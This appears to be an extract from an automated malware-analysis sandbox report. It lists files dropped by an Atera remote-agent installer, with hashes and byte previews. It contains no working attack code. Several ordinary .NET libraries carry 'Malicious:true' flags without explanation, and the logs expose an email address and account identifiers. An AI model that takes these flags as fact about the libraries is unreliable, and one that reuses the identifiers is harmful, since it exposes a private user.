                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\Pubnub.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\ToBeRemoved\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):258
                                                                                                                                                                                                                                        Entropy (8bit):5.161157427052415
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:ATbdAD89w3pKFSQlZh61VIlGUA/DtbXv9DX:Sb+7MSQzh61/htbfVX
                                                                                                                                                                                                                                        MD5:ABCF80416A3928A1D589396C71B421FF
                                                                                                                                                                                                                                        SHA1:C4C2633F4E2130CAEB7EEFD7665AF61D67A13D07
                                                                                                                                                                                                                                        SHA-256:511B7C3B52BD2F2C1E13BA21FA425DFA9901F3CCA0267D991EFD3F07D57B1421
                                                                                                                                                                                                                                        SHA-512:E8B086C4BE01661493447A00FAE4C05ACB6B6D963CF4C2E21F2856F54DA865508523C571A5775F1A313D01AADC8B8D117B48BC79191C24DEB731932263C745EF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:/i /IntegratorLogin=barrostransportes2018@gmail.com /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000MHGA9IAP /AgentId=3757c761-9e50-4f15-8086-0e584dceea48.02/10/2024 09:58:00 Trace Starting..02/10/2024 11:19:47 Trace Starting..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\inprocmessaging\trayProcessMessages.json

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):178
                                                                                                                                                                                                                                        Entropy (8bit):5.251448581447606
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:5PbTsPGxIaFczjCp/qrvb6UgMHDxXpxVNHPQjwvEfrsf3J2MzqRI+OPkvOy:RbTv+zepSrvbRgMHDlpxVNkw8j25rmR9
                                                                                                                                                                                                                                        MD5:33976839322C96D897414B618350AC00
                                                                                                                                                                                                                                        SHA1:8F73680B177C1DADFB309585089223201F711DFD
                                                                                                                                                                                                                                        SHA-256:0CA1890013FAD4B1F384BCE8409E53C92CBB2468D1DCBDD665D7A25A827266BF
                                                                                                                                                                                                                                        SHA-512:D50A2B8C3CB6417EA6F83FD7FE82CBED858D491714736CE500D1A5ADA96572DE730A19DC37C218C709A7BFE376E2B07FFFACC22FD9D2D40CDBC4CBF8F6A3114E
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:eyJJZCI6Ijc1MmNmN2JhLWVmYWYtNGMwZS1iYWZmLWI5ZTY1N2JhODViNiIsIkNyZWF0ZWQiOiIyMDI0LTEwLTAyVDExOjIwOjMyLjU3Mzg2MjYtMDQ6MDAiLCJNZXNzYWdlIjoiX0lOSVRfIiwiVGltZW91dCI6IjAwOjAxOjAwIn0=..

                                                                                                                                                                                                                                        C:\Program Files (x86)\ATERA Networks\AteraAgent\log.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):258
                                                                                                                                                                                                                                        Entropy (8bit):5.161157427052415
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6:ATbdAD89w3pKFSQlZh61VIlGUA/DtbXv9DX:Sb+7MSQzh61/htbfVX
                                                                                                                                                                                                                                        MD5:ABCF80416A3928A1D589396C71B421FF
                                                                                                                                                                                                                                        SHA1:C4C2633F4E2130CAEB7EEFD7665AF61D67A13D07
                                                                                                                                                                                                                                        SHA-256:511B7C3B52BD2F2C1E13BA21FA425DFA9901F3CCA0267D991EFD3F07D57B1421
                                                                                                                                                                                                                                        SHA-512:E8B086C4BE01661493447A00FAE4C05ACB6B6D963CF4C2E21F2856F54DA865508523C571A5775F1A313D01AADC8B8D117B48BC79191C24DEB731932263C745EF
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:/i /IntegratorLogin=barrostransportes2018@gmail.com /CompanyId=1 /IntegratorLoginUI= /CompanyIdUI= /FolderId= /AccountId=001Q300000MHGA9IAP /AgentId=3757c761-9e50-4f15-8086-0e584dceea48.02/10/2024 09:58:00 Trace Starting..02/10/2024 11:19:47 Trace Starting..

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):145968
                                                                                                                                                                                                                                        Entropy (8bit):5.874150428357998
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:bk/SImWggsVz8TzihTmmrG/GOXYsqRK3ybTXzpUTQM9/FMp:ISWB/YrRK3yb37
                                                                                                                                                                                                                                        MD5:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        SHA1:E9AA4E6C514EE951665A7CD6F0B4A4C49146241D
                                                                                                                                                                                                                                        SHA-256:A96A0BA7998A6956C8073B6EFF9306398CC03FB9866E4CABF0810A69BB2A43B2
                                                                                                                                                                                                                                        SHA-512:23F3BD44A5FB66BE7FEA3F7D6440742B657E4050B565C1F8F4684722502D46B68C9E54DCC2486E7DE441482FCC6AA4AD54E94B1D73992EB5D070E2A17F35DE2F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...O..e.........."...0.............f$... ...@....@.. ...............................1....`..................................$..O....@..,...............0(...`......."............................................... ............... ..H............text...|.... ...................... ..`.rsrc...,....@......................@..@.reloc.......`......................@..B................H$......H.......(...D4..........l!..p.............................................{....*.0..N........~......,.~.....+:(.......~....(........(....#.......@....,.(.....+.~.....+..*...0..;........(.......(.....1.(.......(........+....,.~.....+.~.....+..*..0..6........~....%-.&~..........s....%.....s ......o!.....o"....*...0..O........(...........~#...r...po$..........,..rG..ps%...z.rO..p.....(&....~.....o'....*..0..>........~#...r...po(............,'.~#...r...po$............,.rG..ps%...

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\AteraAgent.exe.config

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1442
                                                                                                                                                                                                                                        Entropy (8bit):5.076953226383825
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24:JdfrdB2nk3Jc3J4YH33Jy34OqsJ+J4YHKJy34OOAPF7NhOXrRH2/d9r:3frf2nKS4YHJyILsJ+J4YHKJyIv47O7w
                                                                                                                                                                                                                                        MD5:B3BB71F9BB4DE4236C26578A8FAE2DCD
                                                                                                                                                                                                                                        SHA1:1AD6A034CCFDCE5E3A3CED93068AA216BD0C6E0E
                                                                                                                                                                                                                                        SHA-256:E505B08308622AD12D98E1C7A07E5DC619A2A00BCD4A5CBE04FE8B078BCF94A2
                                                                                                                                                                                                                                        SHA-512:FB6A46708D048A8F964839A514315B9C76659C8E1AB2CD8C5C5D8F312AA4FB628AB3CE5D23A793C41C13A2AA6A95106A47964DAD72A5ECB8D035106FC5B7BA71
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" /></startup>.... <appSettings>.. .. .. .. <add key="ClientSettingsProvider.ServiceUri" value="" />.. </appSettings>.. .. .. <system.web>.. <membership defaultProvider="ClientAuthenticationMembershipProvider">.. <providers>.. <add name="ClientAuthenticationMembershipProvider" type="System.Web.ClientServices.Providers.ClientFormsAuthenticationMembershipProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" />.. </providers>.. </membership>.. <roleManager defaultProvider="ClientRoleProvider" enabled="true">.. <providers>.. <add name="ClientRoleProvider" type="System.Web.ClientServices.Providers.ClientRoleProvider, System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" serviceUri="" cacheTimeout="86

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\BouncyCastle.Crypto.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3318832
                                                                                                                                                                                                                                        Entropy (8bit):6.534876879948643
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:yIBbo0WIgmjljFtXCdRLRBcJd+KaGxHIkMNqzP56O8lZ7qXUqi9p:DBbBWIgWljGxRB/LLp
                                                                                                                                                                                                                                        MD5:11CC798BAFA45BE12D27C68D6B59BA27
                                                                                                                                                                                                                                        SHA1:4D1CA0C0F1BC3691F5F852CC8D3ED88605B70434
                                                                                                                                                                                                                                        SHA-256:443A1C088E62810A954FFE9F0136F7A8D5E44928425D23B5284D936270D9837A
                                                                                                                                                                                                                                        SHA-512:FA0AEAF5309FD1593DB8AF774F18AA9CDA9B7ABD3F32D34CFD1B615EE68CECA0155DFB0AB7351E182B1B9D872BF41B19E66D2B597D2BA6300AF332A0F525C75A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....R............" ..0..r2..........&1.. ....2...... ........................2.....i.3...@.................................G&1.O.....2..............|2.0(....2.....X.(.p............................................ ............... ..H............text....p2.. ...r2................. ..`.rsrc.........2......t2.............@..@.reloc........2......z2.............@..B................{&1.....H...........$....................(.....................................V!........s.........*.~....-*(....o....o....o.........~....-.~.........~....*..( ...*...0..G.......(!....o"....s.1....s*,..%..(.... ....o.....o 0...Zo....t....o8(..(....*..0..$..........(.....(....o.....(!.......io#...*z...(....(!....o"...o....(....*..0............T....r...p.(O....o$....(....*..0..I.......sG...sB)..s.(..s.(...(....s6(....,..o%....2...(....sV(....+.....%..ox...*..( ...*V.(&.....}......}..

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\ICSharpCode.SharpZipLib.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):215088
                                                                                                                                                                                                                                        Entropy (8bit):6.030864151731967
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:r1uYsjrFIzmuxpOI/1MvCdRbpSISC8j7s/k:mIzm6pOIgvr7ok
                                                                                                                                                                                                                                        MD5:C106DF1B5B43AF3B937ACE19D92B42F3
                                                                                                                                                                                                                                        SHA1:7670FC4B6369E3FB705200050618ACAA5213637F
                                                                                                                                                                                                                                        SHA-256:2B5B7A2AFBC88A4F674E1D7836119B57E65FAE6863F4BE6832C38E08341F2D68
                                                                                                                                                                                                                                        SHA-512:616E45E1F15486787418A2B2B8ECA50CACAC6145D353FF66BF2C13839CD3DB6592953BF6FEED1469DB7DDF2F223416D5651CD013FB32F64DC6C72561AB2449AE
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............" ..0..............'... ...@....... ....................................`..................................'..O....@..t............ ..0(...`.......&..T............................................ ............... ..H............text........ ...................... ..`.rsrc...t....@......................@..@.reloc.......`......................@..B.................'......H........... ...................$&........................................( ...*"..(!...*&...("...*&...(#...*2.r...p(....*"..(....*&...(....*&...(....*2.rE..p(....*"..(....*&...(....*&...(....*2.r...p(....*"..(....*&...(....*&...(....*J..r...p($...(....*v....(%.....(%.....(%...(....*....L...%...%.r...p.%...%.r...p.%....%.r+..p.%...(&...(....*..(....*&...(....*&...(....*.0..)........{.........('...t......|......(...+...3.*....0..)........{.........()...t......|......(...+...3.

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\Newtonsoft.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):710192
                                                                                                                                                                                                                                        Entropy (8bit):5.96048066969898
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:3BARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTUU:3BA/ZTvQD0XY0AJBSjRlXP36RMGV
                                                                                                                                                                                                                                        MD5:2C4D25B7FBD1ADFD4471052FA482AF72
                                                                                                                                                                                                                                        SHA1:FD6CD773D241B581E3C856F9E6CD06CB31A01407
                                                                                                                                                                                                                                        SHA-256:2A7A84768CC09A15362878B270371DAAD9872CAACBBEEBE7F30C4A7ED6C03CA7
                                                                                                                                                                                                                                        SHA-512:F7F94EC00435466DB2FB535A490162B906D60A3CFA531A36C4C552183D62D58CCC9A6BB8BBFE39815844B0C3A861D3E1F1178E29DBCB6C09FA2E6EBBB7AB943A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...D.}..........." ..0.................. ........... ....................... ......J.....`.....................................O.......................0(.............T............................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......d....9..................h.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\Pubnub.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):602672
                                                                                                                                                                                                                                        Entropy (8bit):6.145404526272746
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:UShQrHBJEwJiIJJ8TihsEWdzs29glRleqn4uRTJgwhVHhoNw0r17K7DDaiC3KM+9:gHDxJGihsEKwSuTuwvOWgFA
                                                                                                                                                                                                                                        MD5:17D74C03B6BCBCD88B46FCC58FC79A0D
                                                                                                                                                                                                                                        SHA1:BC0316E11C119806907C058D62513EB8CE32288C
                                                                                                                                                                                                                                        SHA-256:13774CC16C1254752EA801538BFB9A9D1328F8B4DD3FF41760AC492A245FBB15
                                                                                                                                                                                                                                        SHA-512:F1457A8596A4D4F9B98A7DCB79F79885FA28BD7FC09A606AD3CD6F37D732EC7E334A64458E51E65D839DDFCDF20B8B5676267AA8CED0080E8CF81A1B2291F030
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...X............." ..0............." ... ...@....... ....................................`.....................................O....@..|...............0(...`..........T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`......................@..B................. ......H............{..................x.......................................r.(......}......}......}....*....0..,........-..{.....o...+.+..{.....{....s.....o...+..*V.(......}......}....*...0...................-..+..o....s"........o$......o,....,..o....,...,....o(........,...oH...,...o......+.......9......o....,..{......o....o....o......s..........o&...8.....{......o....o........9e.....o.....?X.....r...po....9G.....r...po....o....r...p.( ...9&.....r...po....9......r...po....o.....

                                                                                                                                                                                                                                        C:\Program Files\ATERA Networks\AteraAgent\System.ValueTuple.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):73264
                                                                                                                                                                                                                                        Entropy (8bit):5.954475034553661
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:6784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRq:67N1r9KGI04CCARLq
                                                                                                                                                                                                                                        MD5:F4D9D65581BD82AF6108CFA3DD265A9A
                                                                                                                                                                                                                                        SHA1:A926695B1E5D3842D8345C56C087E58845307A16
                                                                                                                                                                                                                                        SHA-256:A3219CD30420EBCF7507C9C9F92FD551AE19999BE247CAA861A8A22D265BE379
                                                                                                                                                                                                                                        SHA-512:144C1195A440907592B22FC947F4284CA36869BDAE495EC8CA5212AF4F63E8E8492FB0EC3B37BF66DB912AF30864C69588D0E35ED9B3D24D36DF3B09DDB5B6C3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`.......f....@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                        C:\Program Files\dotnet\LICENSE.txt

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (514), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9519
                                                                                                                                                                                                                                        Entropy (8bit):4.902271147017698
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:ydP0KvBLCqikR/EgGJLrlwD+eilNi5Py1SDeoDXDw9lF5OMz6Q:PWBuqikR/EDJLriwlNi5KI1Tw9lF5OjQ
                                                                                                                                                                                                                                        MD5:31C5A77B3C57C8C2E82B9541B00BCD5A
                                                                                                                                                                                                                                        SHA1:153D4BC14E3A2C1485006F1752E797CA8684D06D
                                                                                                                                                                                                                                        SHA-256:7F6839A61CE892B79C6549E2DC5A81FDBD240A0B260F8881216B45B7FDA8B45D
                                                                                                                                                                                                                                        SHA-512:AD33E3C0C3B060AD44C5B1B712C991B2D7042F6A60DC691C014D977C922A7E3A783BA9BADE1A34DE853C271FDE1FB75BC2C47869ACD863A40BE3A6C6D754C0A6
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MICROSOFT SOFTWARE LICENSE TERMS..MICROSOFT .NET LIBRARY ..These license terms are an agreement between Microsoft Corporation (or based on where you live, one of its affiliates) and you. Please read them. They apply to the software named above, which includes the media on which you received it, if any. The terms also apply to any Microsoft.. * updates,.. * supplements,.. * Internet-based services, and.. * support services..for this software, unless other terms accompany those items. If so, those terms apply...BY USING THE SOFTWARE, YOU ACCEPT THESE TERMS. IF YOU DO NOT ACCEPT THEM, DO NOT USE THE SOFTWARE...IF YOU COMPLY WITH THESE LICENSE TERMS, YOU HAVE THE PERPETUAL RIGHTS BELOW...1. INSTALLATION AND USE RIGHTS. .. a. Installation and Use. You may install and use any number of copies of the software to design, develop and test your programs... b. Third Party Programs. The software may include third party programs that Microsoft, not the third party, licenses to you under this

                                                                                                                                                                                                                                        C:\Program Files\dotnet\ThirdPartyNotices.txt

                                                                                                                                                                                                                                        Download File
